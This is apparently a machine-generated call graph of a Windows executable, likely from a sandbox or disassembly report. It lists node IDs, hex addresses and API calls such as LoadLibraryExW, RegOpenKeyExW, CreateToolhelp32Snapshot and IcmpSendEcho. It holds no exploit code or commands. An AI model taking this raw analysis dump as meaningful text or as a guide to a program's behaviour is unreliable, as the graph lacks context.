100058->100059 100167 fa5420 100059->100167 100061 fa4efc 100062 fa19e1 59 API calls 100061->100062 100063 fa4f10 100062->100063 100064 fa1c9c 59 API calls 100063->100064 100065 fa4f1b 100064->100065 100181 f9477a 100065->100181 100068 fa1a36 59 API calls 100069 fa4f34 100068->100069 100070 f939be 68 API calls 100069->100070 100071 fa4f44 Mailbox 100070->100071 100072 fa1a36 59 API calls 100071->100072 100073 fa4f68 100072->100073 100074 f939be 68 API calls 100073->100074 100075 fa4f77 Mailbox 100074->100075 100076 fa1207 59 API calls 100075->100076 100077 fa4f94 100076->100077 100184 fa55bc 100077->100184 100080 fb312d _W_store_winword 60 API calls 100081 fa4fae 100080->100081 100082 fa4fb8 100081->100082 100083 fe0a54 100081->100083 100085 fb312d _W_store_winword 60 API calls 100082->100085 100084 fa55bc 59 API calls 100083->100084 100086 fe0a68 100084->100086 100087 fa4fc3 100085->100087 100090 fa55bc 59 API calls 100086->100090 100087->100086 100088 fa4fcd 100087->100088 100089 fb312d _W_store_winword 60 API calls 100088->100089 100091 fa4fd8 100089->100091 100092 fe0a84 100090->100092 100091->100092 100093 fa4fe2 100091->100093 100094 fb00cf 61 API calls 100092->100094 100095 fb312d _W_store_winword 60 API calls 100093->100095 100096 fe0aa7 100094->100096 100097 fa4fed 100095->100097 100098 fa55bc 59 API calls 100096->100098 100099 fe0ad0 100097->100099 100100 fa4ff7 100097->100100 100101 fe0ab3 100098->100101 100103 fa55bc 59 API calls 100099->100103 100102 fa501b 100100->100102 100105 fa1c9c 59 API calls 100100->100105 100104 fa1c9c 59 API calls 100101->100104 100109 f947be 59 API calls 100102->100109 100106 fe0aee 100103->100106 100107 fe0ac1 100104->100107 100108 fa500e 100105->100108 100110 fa1c9c 59 API calls 100106->100110 100111 fa55bc 59 API calls 100107->100111 100112 fa55bc 59 API calls 100108->100112 100113 fa502a 100109->100113 100114 fe0afc 100110->100114 100111->100099 100112->100102 100116 f94540 59 API calls 100113->100116 100115 fa55bc 59 API calls 100114->100115 100117 fe0b0b 100115->100117 100118 fa5038 100116->100118 100117->100117 100190 f943d0 100118->100190 100120 f9477a 59 API calls 100122 fa5055 100120->100122 100121 f943d0 59 API calls 100121->100122 100122->100120 100122->100121 100123 fa55bc 59 API calls 100122->100123 100124 fa509b Mailbox 100122->100124 100123->100122 100124->100007 100126 fa31cc __write_nolock 100125->100126 100127 fe0314 _memset 100126->100127 100128 fa31e5 100126->100128 100130 fe0330 GetOpenFileNameW 100127->100130 100129 fb0284 60 API calls 100128->100129 100131 fa31ee 100129->100131 100132 fe037f 100130->100132 100201 fb09c5 100131->100201 100134 fa1821 59 API calls 100132->100134 100136 fe0394 100134->100136 100136->100136 100138 fa3203 100219 fa278a 100138->100219 100165->100014 100168 fa542d __write_nolock 100167->100168 100169 fa1821 59 API calls 100168->100169 100172 fa5590 Mailbox 100168->100172 100170 fa545f 100169->100170 100171 fa1609 59 API calls 100170->100171 100180 fa5495 Mailbox 100170->100180 100171->100170 100172->100061 100173 fa5563 100173->100172 100174 fa1a36 59 API calls 100173->100174 100175 fa5584 100174->100175 100177 fa4c94 59 API calls 100175->100177 100176 fa1a36 59 API calls 100176->100180 100177->100172 100178 fa1609 59 API calls 100178->100180 100179 fa4c94 59 API calls 100179->100180 100180->100172 100180->100173 100180->100176 100180->100178 100180->100179 100182 fb0fe6 Mailbox 59 API calls 100181->100182 100183 f94787 100182->100183 100183->100068 100185 fa55df 100184->100185 100186 fa55c6 100184->100186 100188 fa1821 59 API calls 100185->100188 100187 fa1c9c 59 API calls 100186->100187 100189 fa4fa0 100187->100189 100188->100189 100189->100080 100191 fcd6c9 100190->100191 100194 f943e7 100190->100194 100191->100194 100200 f940cb 59 API calls Mailbox 100191->100200 100193 f944ef 100193->100122 100194->100193 100195 f944e8 100194->100195 100196 f94530 100194->100196 100198 fb0fe6 Mailbox 59 API calls 100195->100198 100199 f9523c 59 API calls 100196->100199 100198->100193 100199->100193 100200->100194 100202 fc1b70 __write_nolock 100201->100202 100203 fb09d2 GetLongPathNameW 100202->100203 100204 fa1821 59 API calls 100203->100204 100205 fa31f7 100204->100205 100206 fa2f3d 100205->100206 100207 fa1207 59 API calls 100206->100207 100208 fa2f4f 100207->100208 100209 fb0284 60 API calls 100208->100209 100210 fa2f5a 100209->100210 100211 fa2f65 100210->100211 100214 fe0177 100210->100214 100213 fa4c94 59 API calls 100211->100213 100212 fa151f 61 API calls 100212->100214 100215 fa2f71 100213->100215 100214->100212 100216 fe0191 100214->100216 100253 f91307 100215->100253 100218 fa2f84 Mailbox 100218->100138 100259 fa49c2 100219->100259 100222 fdf8d6 100223 fa49c2 136 API calls 100254 f91319 100253->100254 100258 f91338 _memmove 100253->100258 100256 fb0fe6 Mailbox 59 API calls 100254->100256 100255 fb0fe6 Mailbox 59 API calls 100257 f9134f 100255->100257 100256->100258 100257->100218 100258->100255 100443 fa4b29 100259->100443 100264 fe08bb 100267 fa4a2f 84 API calls 100264->100267 100265 fa49ed LoadLibraryExW 100453 fa4ade 100265->100453 100269 fe08c2 100267->100269 100271 fa4ade 3 API calls 100269->100271 100273 fe08ca 100271->100273 100272 fa4a14 100272->100273 100274 fa4a20 100272->100274 100479 fa4ab2 100273->100479 100276 fa4a2f 84 API calls 100274->100276 100278 fa27af 100276->100278 100278->100222 100278->100223 100280 fe08f1 100487 fa4a6e 100280->100487 100492 fa4b77 100443->100492 100446 fa4b50 100447 fa49d4 100446->100447 100448 fa4b60 FreeLibrary 100446->100448 100450 fb547b 100447->100450 100448->100447 100449 fa4b77 2 API calls 100449->100446 100496 fb5490 100450->100496 100452 fa49e1 100452->100264 100452->100265 100577 fa4baa 100453->100577 100456 fa4a05 100460 fa48b0 100456->100460 100457 fa4b15 FreeLibrary 100457->100456 100458 fa4baa 2 API calls 100459 fa4b03 100458->100459 100459->100456 100459->100457 100461 fb0fe6 Mailbox 59 API calls 100460->100461 100462 fa48c5 100461->100462 100463 fa433f 59 API calls 100462->100463 100464 fa48d1 _memmove 100463->100464 100465 fe080a 100464->100465 100466 fa490c 100464->100466 100468 fe0817 100465->100468 100586 ff9ed8 CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 100465->100586 100467 fa4a6e 69 API calls 100466->100467 100471 fa4915 100467->100471 100587 ff9f5e 95 API calls 100468->100587 100472 fe0859 100471->100472 100473 fa4ab2 74 API calls 100471->100473 100476 fa4a8c 85 API calls 100471->100476 100478 fa49a0 100471->100478 100581 fa4a8c 100472->100581 100473->100471 100476->100471 100478->100272 100480 fa4ac4 100479->100480 100483 fe0945 100479->100483 100693 fb5802 100480->100693 100484 ff96c4 100818 ff951a 100484->100818 100486 ff96da 100486->100280 100493 fa4b44 100492->100493 100494 fa4b80 LoadLibraryA 100492->100494 100493->100446 100493->100449 100494->100493 100495 fa4b91 GetProcAddress 100494->100495 100495->100493 100497 fb549c __tzset_nolock 100496->100497 100498 fb54af 100497->100498 100501 fb54e0 100497->100501 100545 fb8d58 58 API calls __getptd_noexit 100498->100545 100500 fb54b4 100546 fb8fe6 9 API calls __vswprintf_l 100500->100546 100515 fc0718 100501->100515 100504 fb54e5 100505 fb54fb 100504->100505 100506 fb54ee 100504->100506 100508 fb5525 100505->100508 100509 fb5505 100505->100509 100547 fb8d58 58 API calls __getptd_noexit 100506->100547 100530 fc0837 100508->100530 100548 fb8d58 58 API calls __getptd_noexit 100509->100548 100512 fb54bf __tzset_nolock @_EH4_CallFilterFunc@8 100512->100452 100516 fc0724 __tzset_nolock 100515->100516 100517 fb9e3b __lock 58 API calls 100516->100517 100528 fc0732 100517->100528 100518 fc07a6 100550 fc082e 100518->100550 100519 fc07ad 100555 fb8a4d 58 API calls 2 library calls 100519->100555 100522 fc0823 __tzset_nolock 100522->100504 100523 fc07b4 100523->100518 100556 fba05b InitializeCriticalSectionAndSpinCount 100523->100556 100524 fb9ec3 __mtinitlocknum 58 API calls 100524->100528 100527 fc07da EnterCriticalSection 100527->100518 100528->100518 100528->100519 100528->100524 100553 fb6e7d 59 API calls __lock 100528->100553 100554 fb6ee7 LeaveCriticalSection LeaveCriticalSection _doexit 100528->100554 100539 fc0857 __wopenfile 100530->100539 100531 fc0871 100561 fb8d58 58 API calls __getptd_noexit 100531->100561 100533 fc0876 100562 fb8fe6 9 API calls __vswprintf_l 100533->100562 100535 fc0a2c 100535->100531 100537 fc0a8f 100535->100537 100536 fb5530 100549 fb5552 LeaveCriticalSection LeaveCriticalSection _fprintf 100536->100549 100558 fc87d1 100537->100558 100539->100531 100539->100535 100563 fb39fb 60 API calls 2 library calls 100539->100563 100541 fc0a25 100541->100535 100564 fb39fb 60 API calls 2 library calls 100541->100564 100543 fc0a44 100543->100535 100565 fb39fb 60 API calls 2 library calls 100543->100565 100545->100500 100546->100512 100547->100512 100548->100512 100549->100512 100557 fb9fa5 LeaveCriticalSection 100550->100557 100552 fc0835 100552->100522 100553->100528 100554->100528 100555->100523 100556->100527 100557->100552 100566 fc7fb5 100558->100566 100560 fc87ea 100560->100536 100561->100533 100562->100536 100563->100541 100564->100543 100565->100535 100567 fc7fc1 __tzset_nolock 100566->100567 100568 fc7fd7 100567->100568 100571 fc800d 100567->100571 100569 fb8d58 __vswprintf_l 58 API calls 100568->100569 100570 fc7fdc 100569->100570 100572 fb8fe6 __vswprintf_l 9 API calls 100570->100572 100573 fc807e __wsopen_nolock 109 API calls 100571->100573 100576 fc7fe6 __tzset_nolock 100572->100576 100574 fc8029 100573->100574 100575 fc8052 __wsopen_helper LeaveCriticalSection 100574->100575 100575->100576 100576->100560 100578 fa4af7 100577->100578 100579 fa4bb3 LoadLibraryA 100577->100579 100578->100458 100578->100459 100579->100578 100580 fa4bc4 GetProcAddress 100579->100580 100580->100578 100582 fa4a9b 100581->100582 100583 fe0923 100581->100583 100588 fb5a6d 100582->100588 100586->100468 100587->100471 100589 fb5a79 __tzset_nolock 100588->100589 100592 fb5ab1 100589->100592 100696 fb581d 100693->100696 100695 fa4ad5 100695->100484 100698 fb5829 __tzset_nolock 100696->100698 100697 fb5864 __tzset_nolock 100697->100695 100698->100697 100699 fb583f _memset 100698->100699 100700 fb586c 100698->100700 100723 fb8d58 58 API calls __getptd_noexit 100699->100723 100701 fb6e3e __lock_file 59 API calls 100700->100701 100703 fb5872 100701->100703 100709 fb563d 100703->100709 100704 fb5859 100724 fb8fe6 9 API calls __vswprintf_l 100704->100724 100712 fb5658 _memset 100709->100712 100716 fb5673 100709->100716 100710 fb5663 100814 fb8d58 58 API calls __getptd_noexit 100710->100814 100712->100710 100712->100716 100720 fb56b3 100712->100720 100713 fb5668 100815 fb8fe6 9 API calls __vswprintf_l 100713->100815 100725 fb58a6 LeaveCriticalSection LeaveCriticalSection _fprintf 100716->100725 100717 fb57c4 _memset 100817 fb8d58 58 API calls __getptd_noexit 100717->100817 100719 fb4906 __fseek_nolock 58 API calls 100719->100720 100720->100716 100720->100717 100720->100719 100726 fc108b 100720->100726 100794 fc0dd7 100720->100794 100816 fc0ef8 58 API calls 3 library calls 100720->100816 100723->100704 100724->100697 100725->100697 100727 fc10ac 100726->100727 100728 fc10c3 100726->100728 100729 fb8d24 __write 58 API calls 100727->100729 100730 fc17fb 100728->100730 100735 fc10fd 100728->100735 100732 fc10b1 100729->100732 100731 fb8d24 __write 58 API calls 100730->100731 100795 fc0de2 100794->100795 100799 fc0df7 100794->100799 100796 fb8d58 __vswprintf_l 58 API calls 100795->100796 100800 fc0e2c 100799->100800 100801 fc6214 __getbuf 58 API calls 100799->100801 100806 fc0df2 100799->100806 100802 fb4906 __fseek_nolock 58 API calls 100800->100802 100801->100800 100806->100720 100814->100713 100815->100716 100816->100720 100817->100713 100821 fb542a GetSystemTimeAsFileTime 100818->100821 100820 ff9529 100820->100486 100822 fb5458 __aulldiv 100821->100822 100822->100820 101031 f96981 101038 f9373a 101031->101038 101033 f96997 101047 f97b3f 101033->101047 101035 f969bf 101037 f9584d 101035->101037 101059 ffa48d 89 API calls 4 library calls 101035->101059 101039 f93758 101038->101039 101040 f93746 101038->101040 101042 f9375e 101039->101042 101043 f93787 101039->101043 101060 f9523c 59 API calls 101040->101060 101044 fb0fe6 Mailbox 59 API calls 101042->101044 101061 f9523c 59 API calls 101043->101061 101046 f93750 101044->101046 101046->101033 101048 fa162d 59 API calls 101047->101048 101049 f97b64 _wcscmp 101048->101049 101050 fa1a36 59 API calls 101049->101050 101052 f97b98 Mailbox 101049->101052 101051 fcffad 101050->101051 101053 fa17e0 59 API calls 101051->101053 101052->101035 101054 fcffb8 101053->101054 101062 f93938 68 API calls 101054->101062 101056 fcffc9 101057 fcffcd Mailbox 101056->101057 101063 f9523c 59 API calls 101056->101063 101057->101035 101059->101037 101060->101046 101061->101046 101062->101056 101063->101057 101064 fa4d83 101065 fa4dba 101064->101065 101066 fa4dd8 101065->101066 101067 fa4e37 101065->101067 101068 fa4e35 101065->101068 101069 fa4ead PostQuitMessage 101066->101069 101070 fa4de5 101066->101070 101072 fa4e3d 101067->101072 101073 fe09c2 101067->101073 101071 fa4e1a DefWindowProcW 101068->101071 101077 fa4e28 101069->101077 101074 fa4df0 101070->101074 101075 fe0a35 101070->101075 101071->101077 101078 fa4e42 101072->101078 101079 fa4e65 SetTimer RegisterWindowMessageW 101072->101079 101119 f9c460 10 API calls Mailbox 101073->101119 101080 fa4df8 101074->101080 101081 fa4eb7 101074->101081 101122 ff2cce 97 API calls _memset 101075->101122 101085 fa4e49 KillTimer 101078->101085 101086 fe0965 101078->101086 101079->101077 101082 fa4e8e CreatePopupMenu 101079->101082 101087 fe0a1a 101080->101087 101088 fa4e03 101080->101088 101109 fa5b29 101081->101109 101082->101077 101084 fe09e9 101120 f9c483 298 API calls Mailbox 101084->101120 101094 fa5ac3 Shell_NotifyIconW 101085->101094 101092 fe099e MoveWindow 101086->101092 101093 fe096a 101086->101093 101087->101071 101121 fe8854 59 API calls Mailbox 101087->101121 101095 fa4e9b 101088->101095 101096 fa4e0e 101088->101096 101089 fe0a47 101089->101071 101089->101077 101092->101077 101097 fe096e 101093->101097 101098 fe098d SetFocus 101093->101098 101099 fa4e5c 101094->101099 101117 fa5bd7 107 API calls _memset 101095->101117 101096->101071 101106 fa5ac3 Shell_NotifyIconW 101096->101106 101097->101096 101103 fe0977 101097->101103 101098->101077 101116 f934e4 DeleteObject DestroyWindow Mailbox 101099->101116 101118 f9c460 10 API calls Mailbox 101103->101118 101104 fa4eab 101104->101077 101107 fe0a0e 101106->101107 101108 fa59d3 94 API calls 101107->101108 101108->101068 101110 fa5bc2 101109->101110 101111 fa5b40 _memset 101109->101111 101110->101077 101112 fa56f8 87 API calls 101111->101112 101114 fa5b67 101112->101114 101113 fa5bab KillTimer SetTimer 101113->101110 101114->101113 101115 fe0d6e Shell_NotifyIconW 101114->101115 101115->101113 101116->101077 101117->101104 101118->101077 101119->101084 101120->101096 101121->101068 101122->101089 98325 f91055 98330 f92a19 98325->98330 98328 fb2f70 __cinit 67 API calls 98329 f91064 98328->98329 98331 fa1207 59 API calls 98330->98331 98332 f92a87 98331->98332 98337 f91256 98332->98337 98334 f92b24 98335 f9105a 98334->98335 98340 f913f8 59 API calls 2 library calls 98334->98340 98335->98328 98341 f91284 98337->98341 98340->98334 98342 f91291 98341->98342 98343 f91275 98341->98343 98342->98343 98344 f91298 RegOpenKeyExW 98342->98344 98343->98334 98344->98343 98345 f912b2 RegQueryValueExW 98344->98345 98346 f912e8 RegCloseKey 98345->98346 98347 f912d3 98345->98347 98346->98343 98347->98346 98348 f95ff5 98372 f95ede Mailbox _memmove 98348->98372 98349 fb0fe6 59 API calls Mailbox 98349->98372 98350 f96a9b 98633 f9a9de 298 API calls 98350->98633 98353 fceff9 98649 f95190 59 API calls Mailbox 98353->98649 98355 fcf007 98650 ffa48d 89 API calls 4 library calls 98355->98650 98359 fcefeb 98406 f95569 Mailbox 98359->98406 98648 fe6cf1 59 API calls Mailbox 98359->98648 98360 f960e5 98361 fce137 98360->98361 98366 f963bd Mailbox 98360->98366 98375 f96abc 98360->98375 98390 f96152 Mailbox 98360->98390 98361->98366 98634 fe7aad 59 API calls 98361->98634 98364 fb0fe6 Mailbox 59 API calls 98369 f963d1 98364->98369 98365 fa1a36 59 API calls 98365->98372 98366->98364 98379 f96426 98366->98379 98371 f963de 98369->98371 98369->98375 98373 f96413 98371->98373 98374 fce172 98371->98374 98372->98349 98372->98350 98372->98353 98372->98355 98372->98360 98372->98365 98372->98375 98372->98406 98418 f953b0 98372->98418 98589 100c355 98372->98589 98632 f9523c 59 API calls 98372->98632 98637 fa1c9c 98372->98637 98641 ff7f11 59 API calls Mailbox 98372->98641 98642 fe6cf1 59 API calls Mailbox 98372->98642 98373->98379 98405 f95447 Mailbox 98373->98405 98635 100c87c 85 API calls 2 library calls 98374->98635 98647 ffa48d 89 API calls 4 library calls 98375->98647 98636 100c9c9 95 API calls Mailbox 98379->98636 98381 fce19d 98381->98381 98383 fcf165 98652 ffa48d 89 API calls 4 library calls 98383->98652 98384 fce691 98644 ffa48d 89 API calls 4 library calls 98384->98644 98385 f969fa 98394 fa1c9c 59 API calls 98385->98394 98387 fb0fe6 59 API calls Mailbox 98387->98405 98390->98359 98390->98375 98395 fce2e9 VariantClear 98390->98395 98390->98406 98446 ffd6be 98390->98446 98491 ff413a 98390->98491 98494 f9d679 98390->98494 98534 100f1b2 98390->98534 98539 100e60c 98390->98539 98542 ff412a 98390->98542 98545 f9cfd7 98390->98545 98564 1005e1d 98390->98564 98631 f95190 59 API calls Mailbox 98390->98631 98643 fe7aad 59 API calls 98390->98643 98391 fce6a0 98392 fa1c9c 59 API calls 98392->98405 98393 f969ff 98393->98383 98393->98384 98394->98406 98395->98390 98397 fcea9a 98399 fa1c9c 59 API calls 98397->98399 98399->98406 98400 fa1207 59 API calls 98400->98405 98401 fe7aad 59 API calls 98401->98405 98402 fb2f70 67 API calls __cinit 98402->98405 98403 fceb67 98403->98406 98645 fe7aad 59 API calls 98403->98645 98405->98384 98405->98385 98405->98387 98405->98392 98405->98393 98405->98397 98405->98400 98405->98401 98405->98402 98405->98403 98405->98406 98407 fcef28 98405->98407 98409 f95a1a 98405->98409 98629 f97e50 298 API calls 2 library calls 98405->98629 98630 f96e30 60 API calls Mailbox 98405->98630 98646 ffa48d 89 API calls 4 library calls 98407->98646 98651 ffa48d 89 API calls 4 library calls 98409->98651 98419 f953cf 98418->98419 98444 f953fd Mailbox 98418->98444 98420 fb0fe6 Mailbox 59 API calls 98419->98420 98420->98444 98421 f969ff 98425 fcf165 98421->98425 98426 fce691 98421->98426 98422 f969fa 98423 fa1c9c 59 API calls 98422->98423 98440 f95569 Mailbox 98423->98440 98424 fe7aad 59 API calls 98424->98444 98659 ffa48d 89 API calls 4 library calls 98425->98659 98655 ffa48d 89 API calls 4 library calls 98426->98655 98427 fa1207 59 API calls 98427->98444 98429 fb0fe6 59 API calls Mailbox 98429->98444 98432 fce6a0 98432->98372 98433 fa1c9c 59 API calls 98433->98444 98435 fcea9a 98437 fa1c9c 59 API calls 98435->98437 98437->98440 98438 fceb67 98438->98440 98656 fe7aad 59 API calls 98438->98656 98439 fb2f70 67 API calls __cinit 98439->98444 98440->98372 98442 fcef28 98657 ffa48d 89 API calls 4 library calls 98442->98657 98444->98421 98444->98422 98444->98424 98444->98426 98444->98427 98444->98429 98444->98433 98444->98435 98444->98438 98444->98439 98444->98440 98444->98442 98445 f95a1a 98444->98445 98653 f97e50 298 API calls 2 library calls 98444->98653 98654 f96e30 60 API calls Mailbox 98444->98654 98658 ffa48d 89 API calls 4 library calls 98445->98658 98447 ffd6e8 98446->98447 98448 ffd6dd 98446->98448 98452 fa1207 59 API calls 98447->98452 98490 ffd7c2 Mailbox 98447->98490 98689 f9502b 98448->98689 98450 fb0fe6 Mailbox 59 API calls 98451 ffd80b 98450->98451 98456 ffd817 98451->98456 98765 fa3df7 60 API calls Mailbox 98451->98765 98453 ffd70c 98452->98453 98454 fa1207 59 API calls 98453->98454 98457 ffd715 98454->98457 98660 f94d37 98456->98660 98460 f94d37 84 API calls 98457->98460 98462 ffd721 98460->98462 98693 fb0119 98462->98693 98465 ffd876 98470 ffd8d8 98465->98470 98471 ffd8a1 98465->98471 98466 ffd842 GetLastError 98468 ffd85b 98466->98468 98467 ffd736 98744 fa17e0 98467->98744 98487 ffd7cb Mailbox 98468->98487 98766 fa3f0b CloseHandle 98468->98766 98474 fb0fe6 Mailbox 59 API calls 98470->98474 98473 fb0fe6 Mailbox 59 API calls 98471->98473 98475 ffd8a6 98473->98475 98479 ffd8dd 98474->98479 98480 ffd8b7 98475->98480 98482 fa1207 59 API calls 98475->98482 98477 f9502b 59 API calls 98477->98490 98478 ff412a 3 API calls 98481 ffd779 98478->98481 98483 fa1207 59 API calls 98479->98483 98479->98487 98767 fffc0d 59 API calls 2 library calls 98480->98767 98485 fa1a36 59 API calls 98481->98485 98489 ffd793 Mailbox 98481->98489 98482->98480 98483->98487 98486 ffd78a 98485->98486 98753 ff3f1d 98486->98753 98487->98390 98489->98477 98490->98450 98490->98487 98835 ff494a GetFileAttributesW 98491->98835 98839 f94f98 98494->98839 98497 fb0fe6 Mailbox 59 API calls 98499 f9d6aa 98497->98499 98501 f9d6ba 98499->98501 98869 fa3df7 60 API calls Mailbox 98499->98869 98500 fd5068 98512 f9d6df 98500->98512 98874 fffbb7 59 API calls 98500->98874 98503 f94d37 84 API calls 98501->98503 98505 f9d6c8 98503->98505 98504 f9502b 59 API calls 98506 fd50b0 98504->98506 98507 fa3e47 67 API calls 98505->98507 98508 f9d6ec 98506->98508 98509 fd50b8 98506->98509 98510 f9d6d7 98507->98510 98852 fa41d6 98508->98852 98511 f9502b 59 API calls 98509->98511 98510->98500 98510->98512 98873 fa3f0b CloseHandle 98510->98873 98515 f9d6f3 98511->98515 98512->98504 98512->98508 98516 f9d70d 98515->98516 98517 fd50ca 98515->98517 98518 fa1207 59 API calls 98516->98518 98519 fb0fe6 Mailbox 59 API calls 98517->98519 98520 f9d715 98518->98520 98521 fd50d0 98519->98521 98870 fa3b7b 65 API calls Mailbox 98520->98870 98523 fd50e4 98521->98523 98857 fa3ea1 98521->98857 98528 fd50e8 _memmove 98523->98528 98860 ff7c7f 98523->98860 98525 f9d724 98525->98528 98871 f94f3c 59 API calls Mailbox 98525->98871 98529 f9d738 Mailbox 98530 f9d772 98529->98530 98531 fa42cf CloseHandle 98529->98531 98530->98390 98532 f9d766 98531->98532 98532->98530 98872 fa3f0b CloseHandle 98532->98872 98535 f94d37 84 API calls 98534->98535 98536 100f1cf 98535->98536 98882 ff4148 CreateToolhelp32Snapshot Process32FirstW 98536->98882 98538 100f1de 98538->98390 98910 100d1c6 98539->98910 98541 100e61c 98541->98390 98543 ff494a 3 API calls 98542->98543 98544 ff4131 98543->98544 98544->98390 98546 f94d37 84 API calls 98545->98546 98547 f9d001 98546->98547 99020 f95278 98547->99020 98549 f9d018 98550 f9d57b 98549->98550 98551 f9502b 59 API calls 98549->98551 98556 f9d439 Mailbox __NMSG_WRITE 98549->98556 98550->98390 98551->98556 98554 fb0c65 62 API calls 98554->98556 98555 f94f98 59 API calls 98555->98556 98556->98550 98556->98554 98556->98555 98559 f94d37 84 API calls 98556->98559 98560 f9502b 59 API calls 98556->98560 98561 fa1821 59 API calls 98556->98561 99025 fb312d 98556->99025 99035 fa59d3 98556->99035 99046 fa5ac3 98556->99046 99050 fa162d 98556->99050 99055 fa153b 59 API calls 2 library calls 98556->99055 99056 f94f3c 59 API calls Mailbox 98556->99056 98559->98556 98560->98556 98561->98556 98565 1005e46 98564->98565 98566 1005e74 WSAStartup 98565->98566 98567 f9502b 59 API calls 98565->98567 98568 1005e9d 98566->98568 98588 1005e88 Mailbox 98566->98588 98569 1005e61 98567->98569 99097 fa40cd 98568->99097 98569->98566 98572 f9502b 59 API calls 98569->98572 98575 1005e70 98572->98575 98573 f94d37 84 API calls 98574 1005eb2 98573->98574 99102 fa402a WideCharToMultiByte 98574->99102 98575->98566 98577 1005ebf inet_addr gethostbyname 98578 1005edd IcmpCreateFile 98577->98578 98577->98588 98579 1005f01 98578->98579 98578->98588 98580 fb0fe6 Mailbox 59 API calls 98579->98580 98581 1005f1a 98580->98581 98582 fa433f 59 API calls 98581->98582 98583 1005f25 98582->98583 98584 1005f34 IcmpSendEcho 98583->98584 98585 1005f55 IcmpSendEcho 98583->98585 98587 1005f6d 98584->98587 98585->98587 98586 1005fd4 IcmpCloseHandle WSACleanup 98586->98588 98587->98586 98588->98390 98590 100c380 98589->98590 98591 100c39a 98589->98591 99139 ffa48d 89 API calls 4 library calls 98590->99139 99112 100a8fd 98591->99112 98595 f953b0 297 API calls 98596 100c406 98595->98596 98597 100c498 98596->98597 98600 100c447 98596->98600 98622 100c392 Mailbox 98596->98622 98598 100c4ee 98597->98598 98599 100c49e 98597->98599 98601 f94d37 84 API calls 98598->98601 98598->98622 99140 ff7ed5 59 API calls 98599->99140 98606 ff789a 59 API calls 98600->98606 98602 100c500 98601->98602 98604 fa1aa4 59 API calls 98602->98604 98607 100c524 CharUpperBuffW 98604->98607 98605 100c4c1 99141 fa35b9 59 API calls Mailbox 98605->99141 98609 100c477 98606->98609 98612 100c53e 98607->98612 98611 fe6ebc 297 API calls 98609->98611 98610 100c4c9 Mailbox 99142 f9b020 98610->99142 98611->98622 98613 100c591 98612->98613 98614 100c545 98612->98614 98616 f94d37 84 API calls 98613->98616 99119 ff789a 98614->99119 98617 100c599 98616->98617 99184 f95376 60 API calls 98617->99184 98622->98372 98623 100c5a3 98623->98622 98624 f94d37 84 API calls 98623->98624 98625 100c5be 98624->98625 99185 fa35b9 59 API calls Mailbox 98625->99185 98627 100c5ce 98628 f9b020 297 API calls 98627->98628 98628->98622 98629->98405 98630->98405 98631->98390 98632->98372 98633->98375 98634->98366 98635->98379 98636->98381 98638 fa1caf 98637->98638 98639 fa1ca7 98637->98639 98638->98372 99701 fa1bcc 59 API calls 2 library calls 98639->99701 98641->98372 98642->98372 98643->98390 98644->98391 98645->98406 98646->98409 98647->98359 98648->98406 98649->98359 98650->98359 98651->98406 98652->98406 98653->98444 98654->98444 98655->98432 98656->98440 98657->98445 98658->98440 98659->98440 98661 f94d51 98660->98661 98670 f94d4b 98660->98670 98662 fcdb28 __i64tow 98661->98662 98663 f94d99 98661->98663 98664 f94d57 __itow 98661->98664 98668 fcda2f 98661->98668 98768 fb38c8 83 API calls 3 library calls 98663->98768 98666 fb0fe6 Mailbox 59 API calls 98664->98666 98669 f94d71 98666->98669 98671 fb0fe6 Mailbox 59 API calls 98668->98671 98676 fcdaa7 Mailbox _wcscpy 98668->98676 98669->98670 98672 fa1a36 59 API calls 98669->98672 98678 fa3e47 98670->98678 98673 fcda74 98671->98673 98672->98670 98674 fb0fe6 Mailbox 59 API calls 98673->98674 98675 fcda9a 98674->98675 98675->98676 98677 fa1a36 59 API calls 98675->98677 98769 fb38c8 83 API calls 3 library calls 98676->98769 98677->98676 98770 fa42cf 98678->98770 98682 fa3e95 98682->98465 98682->98466 98683 fa3e72 98683->98682 98782 fa3c61 62 API calls Mailbox 98683->98782 98685 fa3e84 98783 fa389f 98685->98783 98690 f95041 98689->98690 98691 f9503c 98689->98691 98690->98447 98691->98690 98809 fb37ba 59 API calls 98691->98809 98694 fa1207 59 API calls 98693->98694 98695 fb012f 98694->98695 98696 fa1207 59 API calls 98695->98696 98697 fb0137 98696->98697 98698 fa1207 59 API calls 98697->98698 98699 fb013f 98698->98699 98700 fa1207 59 API calls 98699->98700 98701 fb0147 98700->98701 98702 fb017b 98701->98702 98703 fe627d 98701->98703 98704 fa1462 59 API calls 98702->98704 98705 fa1c9c 59 API calls 98703->98705 98706 fb0189 98704->98706 98707 fe6286 98705->98707 98708 fa1981 59 API calls 98706->98708 98709 fa19e1 59 API calls 98707->98709 98710 fb0193 98708->98710 98713 fb01be 98709->98713 98712 fa1462 59 API calls 98710->98712 98710->98713 98711 fb01fe 98810 fa1462 98711->98810 98714 fb01b4 98712->98714 98713->98711 98715 fb01dd 98713->98715 98731 fe62a6 98713->98731 98717 fa1981 59 API calls 98714->98717 98823 fa1609 98715->98823 98717->98713 98718 fe6376 98721 fa1821 59 API calls 98718->98721 98720 fb020f 98723 fb0221 98720->98723 98724 fa1c9c 59 API calls 98720->98724 98739 fe6333 98721->98739 98725 fb0231 98723->98725 98726 fa1c9c 59 API calls 98723->98726 98724->98723 98728 fa1c9c 59 API calls 98725->98728 98729 fb0238 98725->98729 98726->98725 98727 fa1462 59 API calls 98727->98711 98728->98729 98730 fa1c9c 59 API calls 98729->98730 98741 fb023f Mailbox 98729->98741 98730->98741 98731->98718 98732 fe635f 98731->98732 98738 fe62dd 98731->98738 98732->98718 98734 fe634a 98732->98734 98733 fa1609 59 API calls 98733->98739 98737 fa1821 59 API calls 98734->98737 98735 fe633b 98736 fa1821 59 API calls 98735->98736 98736->98739 98737->98739 98738->98735 98742 fe6326 98738->98742 98739->98711 98739->98733 98826 fa153b 59 API calls 2 library calls 98739->98826 98741->98467 98743 fa1821 59 API calls 98742->98743 98743->98739 98745 fa17f2 98744->98745 98746 fdf401 98744->98746 98828 fa1680 98745->98828 98834 fe87f9 59 API calls _memmove 98746->98834 98749 fa17fe 98749->98478 98749->98489 98750 fdf40b 98751 fa1c9c 59 API calls 98750->98751 98752 fdf413 Mailbox 98751->98752 98754 fa133d 59 API calls 98753->98754 98755 ff3f52 GetFileAttributesW 98754->98755 98756 ff3f66 GetLastError 98755->98756 98763 ff3f7f Mailbox 98755->98763 98757 ff3f73 CreateDirectoryW 98756->98757 98758 ff3f81 98756->98758 98757->98758 98757->98763 98759 fa1981 59 API calls 98758->98759 98758->98763 98760 ff3fc3 98759->98760 